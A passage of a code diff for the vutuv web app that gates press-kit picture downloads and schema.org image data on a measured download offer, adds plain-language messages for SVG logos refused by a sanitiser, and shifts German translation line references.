+      stored before the cleaning shipped can be one the cleaner now refuses, and
+      its Download button answered 404. The PNG keeps its own link either way —
+      it is a rasterisation of the same upload, and no verdict on the markup
+      reaches it. --%>
       <div :if={@view.photo} class="flex flex-wrap gap-2">
-        <.press_download href={PressKit.download_url(@view.image)}>
+        <.press_download :if={@view.download} href={@view.download.url}>
           {gettext("Download %{format}", format: format_name(@view.image))}
         </.press_download>
         <.press_download :if={vector?(@view.image)} href={PressKit.png_download_url(@view.image)}>
@@ -396,6 +402,14 @@ defmodule VutuvWeb.PressKitComponents do
   One field says which case a tile is: `photo` is there exactly when `held` is
   `false`. Held pictures are numbered out of the gallery, deliberately — see the
   moduledoc.
+
+  `download` is `Vutuv.PressKit.download_offer/1`'s answer — the address and the
+  length of the file this picture can actually hand over, or `nil` — and since
+  #2182 it answers three questions rather than one: what the facts line states,
+  what the button points at, and whether that button is drawn at all. Asked
+  **here**, once per picture, because each of those would otherwise ask the disk
+  for the same answer, and for a file the cleaner refuses that answer is the
+  whole strip again, cached nowhere.
   """
   def views(images, viewer) do
     shown = Enum.map(images, &{&1, PressKit.visible_to?(&1, viewer)})
@@ -405,16 +419,26 @@ defmodule VutuvWeb.PressKitComponents do
     {views, _next} =
       Enum.map_reduce(shown, 0, fn
         {image, true}, next ->
+          download = PressKit.download_offer(image)
+
           {%{
              image: image,
              held: false,
-             photo: photo_data(image, next, visible),
-             report: report_href(image, scope)
+             photo: photo_data(image, next, visible, download),
+             report: report_href(image, scope),
+             download: download
            }, next + 1}
 
+        # Nothing is handed over while the AI gate holds a picture, so the disk
+        # is not asked about it either: a held tile carries no download at all.
         {image, false}, next ->
-          {%{image: image, held: PressKit.pixelated_url(image) || :none, photo: nil, report: nil},
-           next}
+          {%{
+             image: image,
+             held: PressKit.pixelated_url(image) || :none,
+             photo: nil,
+             report: nil,
+             download: nil
+           }, next}
       end)
 
     views
@@ -461,23 +485,27 @@ defmodule VutuvWeb.PressKitComponents do
   end
 
   @doc """
-  The pictures of these views a **crawler** may be told about: the released
+  The pictures of these shelves a **crawler** may be told about: the released
   ones. What the page's schema.org block names.
 
-  **Hand it the anonymous views** (`views(images, nil)`), never the reader's: the
-  markup describes the page to a machine, which is always anonymous, and an owner
-  or an admin is shown a picture the AI gate still holds — publishing its
-  `contentUrl` here would name an address that answers 404 to everybody else.
-  Viewer-dependence is the failure mode, so the caller's `nil` is the whole
-  guard.
+  It asks `visible_to?/2` with **no viewer**, deliberately, rather than reading
+  it off `views/2`: the markup describes the page to a machine, which is always
+  anonymous, and an owner or an admin is shown a picture the AI gate still holds
+  — publishing its `contentUrl` here would name an address that answers 404 to
+  everybody else. Viewer-dependence is the failure mode, so the `nil` is the
+  whole guard, and it is this function's rather than the caller's.
+
+  Not a second `views/2` for the same reason it once was one: since #2182 that
+  builds a download offer per picture, which is a disk read this list throws
+  away — up to fifteen of them on every render of a page a crawler visits.
   """
-  def public_pictures(views), do: for(%{held: false, image: image} <- views, do: image)
+  def public_pictures(images), do: Enum.filter(images, &PressKit.visible_to?(&1, nil))
 
   @doc """
   The facts a journalist checks before downloading, and **each one names the file
   it belongs to** (issue #2140). The size goes through `VutuvWeb.UI.file_size/1`,
   so it reads `2,4 MB` rather than as a run of digits, and it is the size of the
-  file that actually arrives (`Vutuv.PressKit.download_bytes/1`), not the
+  file that actually arrives (`Vutuv.PressKit.download_offer/1`), not the
   upload's — a photo is cleaned on its way out.
 
   A **raster** is one file, so the line is its own dimensions and its own bytes.
@@ -487,11 +515,14 @@ defmodule VutuvWeb.PressKitComponents do
   beside the first file's bytes, which is why the PNG's are labelled.
 
   A size we could not measure is left out rather than guessed at: the download
-  such a picture offers answers 404, so a figure beside it would describe
-  nothing.
+  such a picture offers answers 404 — and since #2182 it is not offered at all,
+  which is the same fact said twice rather than two rules.
+
+  `download` is `Vutuv.PressKit.download_offer/1`'s answer, measured once in
+  `views/2`, because the button under this line now turns on it too.
   """
-  def facts_line(%Image{} = image) do
-    size = bytes(PressKit.download_bytes(image))
+  def facts_line(%Image{} = image, download) do
+    size = download && file_size(download.bytes)
 
     case {pixels(image), vector?(image)} do
       {nil, _} -> [size]
@@ -509,8 +540,13 @@ defmodule VutuvWeb.PressKitComponents do
   tiles and the section page's anchors cannot describe the same picture
   differently. `xl` is the version the overlay opens, the same one a post photo
   opens at.
+
+  `download` gates the overlay's own download the way it gates the button under
+  the picture (issue #2182): the overlay's footer is the second place the same
+  address is offered from, and a control that 404s there is worse, because a
+  reader has already committed to the picture by the time they see it.
   """
-  def photo_data(%Image{} = image, index, count) do
+  def photo_data(%Image{} = image, index, count, download) do
     %{
       index: index,
       src: PressKit.lightbox_url(image),
@@ -521,7 +557,7 @@ defmodule VutuvWeb.PressKitComponents do
       # in the one place a journalist reads the caption is a rendering fault.
       caption: Markdown.to_plain_text(image.caption),
       credit: image.credit,
-      download: PressKit.download_url(image),
+      download: download && download.url,
       license: PressKit.rights_line(),
       position: gettext("Photo %{n} of %{total}", n: index + 1, total: count)
     }
@@ -548,6 +584,7 @@ defmodule VutuvWeb.PressKitComponents do
   # ending the facts line on a dangling dot. A control is not a word in the
   # sentence, so it takes a gap rather than punctuation.
   attr(:image, :any, required: true)
+  attr(:download, :any, default: nil)
   attr(:report, :any, default: nil)
 
   defp press_meta(assigns) do
@@ -560,7 +597,7 @@ defmodule VutuvWeb.PressKitComponents do
     <p class="mt-2 text-xs text-slate-500 dark:text-slate-400">
       <span :if={present?(@image.credit)} data-press-credit>{@image.credit}</span>
       <span :if={present?(@image.credit)} aria-hidden="true">·</span>
-      <span data-press-facts>{facts_line(@image)}</span>
+      <span data-press-facts>{facts_line(@image, @download)}</span>
       <a
         :if={@report}
         href={@report}
@@ -659,9 +696,6 @@ defmodule VutuvWeb.PressKitComponents do
     do: dimensions(w, h)
 
   defp pixels(%Image{}), do: nil
-
-  defp bytes(nil), do: nil
-  defp bytes(size) when is_integer(size), do: file_size(size)
 
   # SVG only ever leaves as an attachment (#2083), so a vector variant offers
   # the PNG rendering beside it.

--- a/lib/vutuv_web/live/press_kit_live.ex
+++ b/lib/vutuv_web/live/press_kit_live.ex
@@ -532,6 +532,31 @@ defmodule VutuvWeb.PressKitLive do
   defp write_error(:forbidden, _logo?),
     do: gettext("You cannot add a picture to this Media Kit.")
 
+  # The three a member can act on (issue #2182). Every other refusal here is
+  # ours rather than theirs, so it keeps the one sentence below; these three
+  # name the thing in **their** file and say what to do about it, because a
+  # design tool put it there without asking and "that file could not be
+  # processed" sent people to rewrite a logo that was never the problem.
+  defp write_error(:svg_event_handler, _logo?),
+    do:
+      gettext(
+        "This logo carries a script, in an attribute whose name starts with %{marker}. Whoever downloads it runs that script when they open the file, so export the logo without any interactivity.",
+        marker: "on"
+      )
+
+  defp write_error(:svg_embedded_file, _logo?),
+    do:
+      gettext(
+        "This logo has a file embedded in it, usually a web font, that vutuv cannot check. Export it again with the text converted to outlines."
+      )
+
+  defp write_error(:svg_unreadable_data, _logo?),
+    do:
+      gettext(
+        "This logo contains %{marker}, which vutuv reads as an embedded file and cannot decode. Remove it, or reword the title or description it sits in.",
+        marker: "data:"
+      )
+
   defp write_error(%Ecto.Changeset{errors: errors} = changeset, _logo?) do
     if Keyword.has_key?(errors, :rights_confirmed),
       do: gettext("Please confirm the rights first, then choose the file."),

--- a/lib/vutuv_web/templates/press_kit/index.html.heex
+++ b/lib/vutuv_web/templates/press_kit/index.html.heex
@@ -20,7 +20,7 @@ a picture the AI gate still holds, and naming its `contentUrl` here would
 publish an address that answers 404 to everybody else. Only for an owner search
 engines may index at all (`Vutuv.Identity.indexable?/1`, the one answer to that
 question for a member and for a page alike). --%>
-<% pictures = public_pictures(views(@shelves.photos ++ @shelves.logos, nil)) %>
+<% pictures = public_pictures(@shelves.photos ++ @shelves.logos) %>
 <JsonLd.script
   :if={Vutuv.Identity.indexable?(@owner) and pictures != []}
   data={JsonLd.press_kit_page(@owner, pictures, Vutuv.PressKit.rights_line())}

--- a/lib/vutuv_web/views/json_ld.ex
+++ b/lib/vutuv_web/views/json_ld.ex
@@ -466,17 +466,25 @@ defmodule VutuvWeb.JsonLd do
   # is the one number here a person never reads, and schema.org wants bytes.
   # A vector claims no `width`/`height`: those describe the PNG rendering, not
   # the SVG at `contentUrl`.
+  #
+  # Both travel together or neither does (issue #2182): the size disappeared on
+  # its own for a picture whose file cannot be handed over, leaving a
+  # `contentUrl` a crawler would fetch and get a 404 from — which is worse than
+  # an `ImageObject` that describes the picture and names no file, since the
+  # thumbnail beside it is real.
   defp press_image_object(image, credit_holder, page_url, rights) do
+    download = PressKit.download_offer(image)
+
     compact(%{
       "@type" => "ImageObject",
-      "contentUrl" => absolute(PressKit.download_url(image)),
+      "contentUrl" => download && absolute(download.url),
       "thumbnailUrl" => absolute(PressKit.url(image, "thumb")),
       "width" => raster_only(image, image.width),
       "height" => raster_only(image, image.height),
       "caption" => Markdown.to_plain_text(image.caption),
       "description" => image.alt,
       "encodingFormat" => image.content_type,
-      "contentSize" => content_size(image),
+      "contentSize" => download && Integer.to_string(download.bytes),
       # The credit line the owner typed is the one a reuser must print; where
       # they typed none, the owner's own name is who to credit.
       "creditText" => image.credit || credit_holder,
@@ -490,11 +498,6 @@ defmodule VutuvWeb.JsonLd do
   end
 
   defp raster_only(image, value), do: if(PressKit.vector?(image), do: nil, else: value)
-
-  defp content_size(image) do
-    bytes = PressKit.download_bytes(image)
-    bytes && Integer.to_string(bytes)
-  end
 
   @doc """
   A visible `<.page_header>` crumbs trail as a schema.org BreadcrumbList:

--- a/priv/gettext/de/LC_MESSAGES/default.po
+++ b/priv/gettext/de/LC_MESSAGES/default.po
@@ -119,8 +119,8 @@ msgstr "Geburtstag"
 #: lib/vutuv_web/live/organization_live/edit.ex:378
 #: lib/vutuv_web/live/organization_live/new.ex:222
 #: lib/vutuv_web/live/post_live/composer.ex:2049
-#: lib/vutuv_web/live/press_kit_live.ex:729
-#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:754
+#: lib/vutuv_web/live/press_kit_live.ex:1164
 #: lib/vutuv_web/templates/ad/new.html.heex:136
 #: lib/vutuv_web/templates/admin/legal_page/edit.html.heex:40
 #: lib/vutuv_web/templates/admin/newsletter/form_content.html.heex:57
@@ -165,7 +165,7 @@ msgstr "Kontakt"
 msgid "Couldn't follow back to %{name}."
 msgstr "%{name} konnte nicht zurückgefolgt werden."
 
-#: lib/vutuv_web/components/post_components.ex:4701
+#: lib/vutuv_web/components/post_components.ex:4704
 #: lib/vutuv_web/components/ui.ex:5042
 #: lib/vutuv_web/live/admin/job_live.ex:486
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:621
@@ -213,15 +213,15 @@ msgstr "Inaktivieren"
 msgid "Download"
 msgstr "Download"
 
-#: lib/vutuv_web/components/post_components.ex:4666
+#: lib/vutuv_web/components/post_components.ex:4669
 #: lib/vutuv_web/components/ui.ex:5033
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:613
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:649
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:150
 #: lib/vutuv_web/live/job_posting_live/show.ex:201
 #: lib/vutuv_web/live/organization_live/show.ex:159
-#: lib/vutuv_web/live/press_kit_live.ex:691
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:716
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #: lib/vutuv_web/templates/admin/legal_page/index.html.heex:50
 #: lib/vutuv_web/templates/admin/newsletter/edit.html.heex:7
 #: lib/vutuv_web/templates/admin/newsletter/show.html.heex:19
@@ -622,8 +622,8 @@ msgstr "Öffentlich"
 #: lib/vutuv_web/components/ui.ex:4934
 #: lib/vutuv_web/live/organization_live/edit.ex:376
 #: lib/vutuv_web/live/post_live/composer.ex:2376
-#: lib/vutuv_web/live/press_kit_live.ex:727
-#: lib/vutuv_web/live/press_kit_live.ex:1138
+#: lib/vutuv_web/live/press_kit_live.ex:752
+#: lib/vutuv_web/live/press_kit_live.ex:1163
 #: lib/vutuv_web/templates/admin/pref/index.html.heex:71
 #: lib/vutuv_web/templates/admin/user_pref/show.html.heex:84
 #: lib/vutuv_web/templates/settings/apps.html.heex:63
@@ -657,7 +657,7 @@ msgstr "Speichern"
 #: lib/vutuv_web/live/search_live.ex:680
 #: lib/vutuv_web/live/shell_live.ex:1495
 #: lib/vutuv_web/live/shell_live.ex:1702
-#: lib/vutuv_web/live/tag_live/timeline.ex:353
+#: lib/vutuv_web/live/tag_live/timeline.ex:354
 #: lib/vutuv_web/templates/admin/account/index.html.heex:23
 #: lib/vutuv_web/templates/admin/account/index.html.heex:35
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:30
@@ -1208,7 +1208,7 @@ msgstr "Alle Tag-Synonyme"
 msgid "All tag urls"
 msgstr "Alle Tag-URLs"
 
-#: lib/vutuv_web/components/post_components.ex:5319
+#: lib/vutuv_web/components/post_components.ex:5322
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:2
 #: lib/vutuv_web/templates/tag/index.html.heex:1
 #: lib/vutuv_web/templates/user/show.html.heex:643
@@ -2119,7 +2119,7 @@ msgstr "Zurück zum Beitrag"
 #: lib/vutuv_web/live/post_live/composer.ex:2147
 #: lib/vutuv_web/live/post_live/composer.ex:2170
 #: lib/vutuv_web/live/post_live/composer.ex:2196
-#: lib/vutuv_web/live/press_kit_live.ex:1307
+#: lib/vutuv_web/live/press_kit_live.ex:1332
 #, elixir-autogen, elixir-format
 msgid "Cancel upload"
 msgstr "Upload abbrechen"
@@ -2129,7 +2129,7 @@ msgstr "Upload abbrechen"
 msgid "Delete post"
 msgstr "Beitrag löschen"
 
-#: lib/vutuv_web/components/post_components.ex:4698
+#: lib/vutuv_web/components/post_components.ex:4701
 #: lib/vutuv_web/live/post_live/edit.ex:151
 #, elixir-autogen, elixir-format
 msgid "Delete this post permanently?"
@@ -2145,7 +2145,7 @@ msgstr "Beitrag bearbeiten"
 #: lib/vutuv_web/gettext_extraction_anchors.ex:87
 #: lib/vutuv_web/live/organization_live/feed.ex:203
 #: lib/vutuv_web/live/post_live/feed.ex:366
-#: lib/vutuv_web/live/post_live/feed.ex:3594
+#: lib/vutuv_web/live/post_live/feed.ex:3592
 #: lib/vutuv_web/live/post_live/feed_calendar.ex:46
 #: lib/vutuv_web/live/shell_live.ex:1346
 #: lib/vutuv_web/live/shell_live.ex:1692
@@ -2174,8 +2174,8 @@ msgstr "Vor einer bestimmten Person verbergen…"
 msgid "Hide this post from…"
 msgstr "Diesen Beitrag verbergen vor…"
 
-#: lib/vutuv_web/components/post_components.ex:4644
-#: lib/vutuv_web/components/post_components.ex:4646
+#: lib/vutuv_web/components/post_components.ex:4647
+#: lib/vutuv_web/components/post_components.ex:4649
 #, elixir-autogen, elixir-format
 msgid "Limited audience"
 msgstr "Eingeschränkte Sichtbarkeit"
@@ -2191,7 +2191,7 @@ msgstr "Nicht eingeloggte Besucher"
 msgid "No more than %{max} images per post."
 msgstr "Höchstens %{max} Bilder pro Beitrag."
 
-#: lib/vutuv_web/live/post_live/feed.ex:3935
+#: lib/vutuv_web/live/post_live/feed.ex:3933
 #, elixir-autogen, elixir-format
 msgid "Nothing here yet. Follow people to fill your feed, or write your first post."
 msgstr ""
@@ -2224,7 +2224,7 @@ msgstr "Posten"
 msgid "Post deleted successfully."
 msgstr "Beitrag erfolgreich gelöscht."
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:243
+#: lib/vutuv_web/agent_docs/post_doc.ex:244
 #: lib/vutuv_web/controllers/post_controller.ex:69
 #: lib/vutuv_web/controllers/post_controller.ex:90
 #: lib/vutuv_web/controllers/user_controller.ex:77
@@ -2242,13 +2242,13 @@ msgstr "Beitrag erfolgreich gelöscht."
 msgid "Posts"
 msgstr "Beiträge"
 
-#: lib/vutuv_web/components/post_components.ex:5192
-#: lib/vutuv_web/components/post_components.ex:5196
+#: lib/vutuv_web/components/post_components.ex:5195
+#: lib/vutuv_web/components/post_components.ex:5199
 #, elixir-autogen, elixir-format
 msgid "Read more"
 msgstr "Weiterlesen"
 
-#: lib/vutuv_web/components/post_components.ex:5193
+#: lib/vutuv_web/components/post_components.ex:5196
 #: lib/vutuv_web/live/fediverse_account_live.ex:394
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:146
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:236
@@ -2270,7 +2270,7 @@ msgstr "Weniger anzeigen"
 #: lib/vutuv_web/live/post_live/saved.ex:666
 #: lib/vutuv_web/live/post_live/saved.ex:694
 #: lib/vutuv_web/live/post_rewrites_live.ex:376
-#: lib/vutuv_web/live/press_kit_live.ex:1065
+#: lib/vutuv_web/live/press_kit_live.ex:1090
 #: lib/vutuv_web/templates/connection/index.html.heex:45
 #: lib/vutuv_web/views/settings_html.ex:386
 #, elixir-autogen, elixir-format
@@ -2304,7 +2304,7 @@ msgstr "Diese Seite konnte leider nicht gefunden werden."
 #: lib/vutuv_web/attachment_text.ex:73
 #: lib/vutuv_web/live/post_live/composer.ex:1615
 #: lib/vutuv_web/live/post_live/composer.ex:1720
-#: lib/vutuv_web/live/press_kit_live.ex:541
+#: lib/vutuv_web/live/press_kit_live.ex:566
 #, elixir-autogen, elixir-format
 msgid "That file could not be processed."
 msgstr "Diese Datei konnte nicht verarbeitet werden."
@@ -2348,27 +2348,27 @@ msgstr "Was gibt's Neues?"
 msgid "What's new? Markdown is supported."
 msgstr "Was gibt's Neues? Markdown wird unterstützt."
 
-#: lib/vutuv_web/components/post_components.ex:4641
+#: lib/vutuv_web/components/post_components.ex:4644
 #, elixir-autogen, elixir-format
 msgid "edited"
 msgstr "bearbeitet"
 
-#: lib/vutuv_web/components/post_components.ex:6959
+#: lib/vutuv_web/components/post_components.ex:6962
 #, elixir-autogen, elixir-format
 msgid "everyone else"
 msgstr "alle anderen"
 
-#: lib/vutuv_web/components/post_components.ex:6963
+#: lib/vutuv_web/components/post_components.ex:6966
 #, elixir-autogen, elixir-format
 msgid "logged-out visitors"
 msgstr "nicht eingeloggte Besucher"
 
-#: lib/vutuv_web/components/post_components.ex:6961
+#: lib/vutuv_web/components/post_components.ex:6964
 #, elixir-autogen, elixir-format
 msgid "people who don't follow you"
 msgstr "Personen, die Ihnen nicht folgen"
 
-#: lib/vutuv_web/components/post_components.ex:6962
+#: lib/vutuv_web/components/post_components.ex:6965
 #, elixir-autogen, elixir-format
 msgid "people you don't follow"
 msgstr "Personen, denen Sie nicht folgen"
@@ -2415,7 +2415,7 @@ msgid "All posts"
 msgstr "Alle Beiträge"
 
 #: lib/vutuv_web/components/post_components.ex:2186
-#: lib/vutuv_web/components/post_components.ex:7062
+#: lib/vutuv_web/components/post_components.ex:7065
 #: lib/vutuv_web/components/ui.ex:4476
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2434,7 +2434,7 @@ msgid "Bookmarks"
 msgstr "Lesezeichen"
 
 #: lib/vutuv_web/components/post_components.ex:2130
-#: lib/vutuv_web/components/post_components.ex:7303
+#: lib/vutuv_web/components/post_components.ex:7279
 #: lib/vutuv_web/components/ui.ex:4462
 #: lib/vutuv_web/notification_line.ex:342
 #: lib/vutuv_web/views/user_html.ex:486
@@ -2443,7 +2443,7 @@ msgid "Like"
 msgstr "Gefällt mir"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1301
-#: lib/vutuv_web/components/post_components.ex:7313
+#: lib/vutuv_web/components/post_components.ex:7289
 #: lib/vutuv_web/live/post_live/saved.ex:193
 #: lib/vutuv_web/live/post_live/saved.ex:526
 #: lib/vutuv_web/live/shell_live.ex:1596
@@ -2464,13 +2464,13 @@ msgstr "Hier ist noch nichts. Beiträge mit Lesezeichen erscheinen hier."
 msgid "Nothing here yet. Posts you like show up here."
 msgstr "Hier ist noch nichts. Beiträge, die Ihnen gefallen, erscheinen hier."
 
-#: lib/vutuv_web/components/post_components.ex:7050
+#: lib/vutuv_web/components/post_components.ex:7053
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be reposted."
 msgstr "Nur öffentliche Beiträge können repostet werden."
 
 #: lib/vutuv_web/components/post_components.ex:2185
-#: lib/vutuv_web/components/post_components.ex:7061
+#: lib/vutuv_web/components/post_components.ex:7064
 #: lib/vutuv_web/live/post_live/saved.ex:822
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2478,26 +2478,26 @@ msgid "Remove bookmark"
 msgstr "Lesezeichen entfernen"
 
 #: lib/vutuv_web/components/post_components.ex:2166
-#: lib/vutuv_web/components/post_components.ex:7046
+#: lib/vutuv_web/components/post_components.ex:7049
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:168
 #, elixir-autogen, elixir-format
 msgid "Repost"
 msgstr "Reposten"
 
 #: lib/vutuv_web/components/post_components.ex:2759
-#: lib/vutuv_web/components/post_components.ex:6065
+#: lib/vutuv_web/components/post_components.ex:6068
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name}"
 msgstr "Repostet von %{name}"
 
 #: lib/vutuv_web/components/post_components.ex:2165
-#: lib/vutuv_web/components/post_components.ex:7045
+#: lib/vutuv_web/components/post_components.ex:7048
 #, elixir-autogen, elixir-format
 msgid "Undo repost"
 msgstr "Repost zurücknehmen"
 
 #: lib/vutuv_web/components/post_components.ex:2129
-#: lib/vutuv_web/components/post_components.ex:7302
+#: lib/vutuv_web/components/post_components.ex:7278
 #: lib/vutuv_web/live/post_live/saved.ex:821
 #: lib/vutuv_web/views/user_html.ex:486
 #, elixir-autogen, elixir-format
@@ -2525,7 +2525,7 @@ msgstr "Entfolgen"
 msgid "Welcome to vutuv!"
 msgstr "Willkommen bei vutuv!"
 
-#: lib/vutuv_web/components/post_components.ex:7357
+#: lib/vutuv_web/components/post_components.ex:7333
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be answered."
 msgstr "Nur öffentliche Beiträge können beantwortet werden."
@@ -2537,8 +2537,8 @@ msgid "Replies"
 msgstr "Antworten"
 
 #: lib/vutuv_web/components/post_components.ex:2375
-#: lib/vutuv_web/components/post_components.ex:7340
-#: lib/vutuv_web/components/post_components.ex:7341
+#: lib/vutuv_web/components/post_components.ex:7316
+#: lib/vutuv_web/components/post_components.ex:7317
 #: lib/vutuv_web/live/notification_live/index.ex:993
 #: lib/vutuv_web/live/post_live/reply.ex:49
 #: lib/vutuv_web/notification_line.ex:339
@@ -2546,7 +2546,7 @@ msgstr "Antworten"
 msgid "Reply"
 msgstr "Antworten"
 
-#: lib/vutuv_web/components/post_components.ex:4600
+#: lib/vutuv_web/components/post_components.ex:4603
 #, elixir-autogen, elixir-format
 msgid "Reply to a deleted post"
 msgstr "Antwort auf einen gelöschten Beitrag"
@@ -2567,7 +2567,7 @@ msgstr "Dieser Beitrag wurde geteilt oder beantwortet. Solange es geteilte Beitr
 msgid "replied to your post."
 msgstr "hat auf Ihren Beitrag geantwortet."
 
-#: lib/vutuv_web/components/post_components.ex:4118
+#: lib/vutuv_web/components/post_components.ex:4121
 #: lib/vutuv_web/live/post_live/remote_post_reply.ex:63
 #: lib/vutuv_web/live/post_live/remote_reply.ex:61
 #: lib/vutuv_web/live/post_live/reply.ex:63
@@ -2575,14 +2575,14 @@ msgstr "hat auf Ihren Beitrag geantwortet."
 msgid "Reply to %{handle}"
 msgstr "Auf %{handle} antworten"
 
-#: lib/vutuv_web/components/post_components.ex:4572
+#: lib/vutuv_web/components/post_components.ex:4575
 #, elixir-autogen, elixir-format
 msgid "Reply to a now-deleted post by %{handle}"
 msgstr "Antwort auf einen inzwischen gelöschten Beitrag von %{handle}"
 
-#: lib/vutuv_web/components/post_components.ex:4563
-#: lib/vutuv_web/components/post_components.ex:4592
+#: lib/vutuv_web/components/post_components.ex:4566
 #: lib/vutuv_web/components/post_components.ex:4595
+#: lib/vutuv_web/components/post_components.ex:4598
 #, elixir-autogen, elixir-format
 msgid "Replying to %{handle}"
 msgstr "Antwort an %{handle}"
@@ -2884,7 +2884,7 @@ msgid_plural "connections"
 msgstr[0] "Vernetzung"
 msgstr[1] "Vernetzungen"
 
-#: lib/vutuv_web/components/post_components.ex:6960
+#: lib/vutuv_web/components/post_components.ex:6963
 #, elixir-autogen, elixir-format
 msgid "people who aren't your connections"
 msgstr "Personen, mit denen Sie nicht vernetzt sind"
@@ -3152,7 +3152,7 @@ msgstr "Nacktheit, Gewalt oder andere Inhalte, die nicht auf vutuv gehören."
 msgid "Only visible to you"
 msgstr "Nur für Sie sichtbar"
 
-#: lib/vutuv_web/components/post_components.ex:4539
+#: lib/vutuv_web/components/post_components.ex:4542
 #, elixir-autogen, elixir-format
 msgid "Only you can see this post while a report about it is handled."
 msgstr "Solange eine Meldung zu diesem Beitrag bearbeitet wird, sehen nur Sie ihn."
@@ -3214,8 +3214,8 @@ msgstr "Entfernen. Damit ist die Meldung erledigt, ohne weitere Fragen."
 
 #: lib/vutuv_web/components/post_components.ex:1467
 #: lib/vutuv_web/components/post_components.ex:3419
-#: lib/vutuv_web/components/post_components.ex:3627
-#: lib/vutuv_web/components/post_components.ex:4769
+#: lib/vutuv_web/components/post_components.ex:3631
+#: lib/vutuv_web/components/post_components.ex:4772
 #: lib/vutuv_web/live/organization_live/show.ex:684
 #: lib/vutuv_web/templates/user/show.html.heex:252
 #, elixir-autogen, elixir-format
@@ -3979,7 +3979,7 @@ msgstr "Am häufigsten empfohlene Mitglieder"
 msgid "People %{name} follows"
 msgstr "Wem %{name} folgt"
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:244
+#: lib/vutuv_web/agent_docs/post_doc.ex:245
 #, elixir-autogen, elixir-format
 msgid "Post archive of %{name}"
 msgstr "Beitragsarchiv von %{name}"
@@ -4653,7 +4653,7 @@ msgstr "Sie haben niemanden blockiert."
 msgid "You unblocked @%{slug}."
 msgstr "Sie haben die Blockierung von @%{slug} aufgehoben."
 
-#: lib/vutuv_web/live/post_live/feed.ex:3940
+#: lib/vutuv_web/live/post_live/feed.ex:3938
 #, elixir-autogen, elixir-format
 msgid "Discover people to follow"
 msgstr "Entdecken Sie Mitglieder zum Folgen"
@@ -5584,9 +5584,9 @@ msgstr "Hauptnavigation"
 msgid "Footer navigation"
 msgstr "Fußzeilen-Navigation"
 
-#: lib/vutuv_web/components/post_components.ex:4849
-#: lib/vutuv_web/components/post_components.ex:5458
-#: lib/vutuv_web/components/post_components.ex:5796
+#: lib/vutuv_web/components/post_components.ex:4852
+#: lib/vutuv_web/components/post_components.ex:5461
+#: lib/vutuv_web/components/post_components.ex:5799
 #: lib/vutuv_web/live/notification_live/index.ex:1069
 #: lib/vutuv_web/views/user_html.ex:133
 #, elixir-autogen, elixir-format
@@ -5627,7 +5627,7 @@ msgstr "Art der E-Mail"
 msgid "Type of email address"
 msgstr "Art der E-Mail-Adresse"
 
-#: lib/vutuv_web/live/press_kit_live.ex:628
+#: lib/vutuv_web/live/press_kit_live.ex:653
 #: lib/vutuv_web/templates/user/edit.html.heex:256
 #, elixir-autogen, elixir-format
 msgid "About you"
@@ -5959,7 +5959,7 @@ msgid "Name (A-Z)"
 msgstr "Name (A-Z)"
 
 #: lib/vutuv_web/live/post_live/saved.ex:507
-#: lib/vutuv_web/live/tag_live/timeline.ex:453
+#: lib/vutuv_web/live/tag_live/timeline.ex:454
 #, elixir-autogen, elixir-format
 msgid "Newest first"
 msgstr "Neueste zuerst"
@@ -5985,7 +5985,7 @@ msgid "Nothing here yet. People you like show up here."
 msgstr "Hier ist noch nichts. Personen, die Ihnen gefallen, erscheinen hier."
 
 #: lib/vutuv_web/live/post_live/saved.ex:508
-#: lib/vutuv_web/live/tag_live/timeline.ex:454
+#: lib/vutuv_web/live/tag_live/timeline.ex:455
 #, elixir-autogen, elixir-format
 msgid "Oldest first"
 msgstr "Älteste zuerst"
@@ -6007,7 +6007,7 @@ msgid "Search saved items"
 msgstr "Gespeicherte durchsuchen"
 
 #: lib/vutuv_web/live/post_live/saved.ex:570
-#: lib/vutuv_web/live/tag_live/timeline.ex:369
+#: lib/vutuv_web/live/tag_live/timeline.ex:370
 #, elixir-autogen, elixir-format
 msgid "Sort"
 msgstr "Sortieren"
@@ -6415,7 +6415,7 @@ msgid "View all phone numbers"
 msgstr "Alle Telefonnummern anzeigen"
 
 #: lib/vutuv_web/live/feed_languages_live.ex:235
-#: lib/vutuv_web/live/press_kit_live.ex:979
+#: lib/vutuv_web/live/press_kit_live.ex:1004
 #: lib/vutuv_web/live/section_reorder_live.ex:128
 #, elixir-autogen, elixir-format
 msgid "Drag to reorder"
@@ -6430,7 +6430,7 @@ msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:267
 #: lib/vutuv_web/live/post_rewrites_live.ex:364
-#: lib/vutuv_web/live/press_kit_live.ex:1041
+#: lib/vutuv_web/live/press_kit_live.ex:1066
 #: lib/vutuv_web/live/section_reorder_live.ex:156
 #, elixir-autogen, elixir-format
 msgid "Move down"
@@ -6438,7 +6438,7 @@ msgstr "Nach unten"
 
 #: lib/vutuv_web/live/feed_languages_live.ex:256
 #: lib/vutuv_web/live/post_rewrites_live.ex:352
-#: lib/vutuv_web/live/press_kit_live.ex:1030
+#: lib/vutuv_web/live/press_kit_live.ex:1055
 #: lib/vutuv_web/live/section_reorder_live.ex:147
 #, elixir-autogen, elixir-format
 msgid "Move up"
@@ -6832,8 +6832,8 @@ msgstr ""
 "und Antworten über Sie mit. Mit beiden aus zum Beispiel:"
 
 #: lib/vutuv_web/components/post_components.ex:3346
-#: lib/vutuv_web/components/post_components.ex:4722
-#: lib/vutuv_web/components/post_components.ex:4736
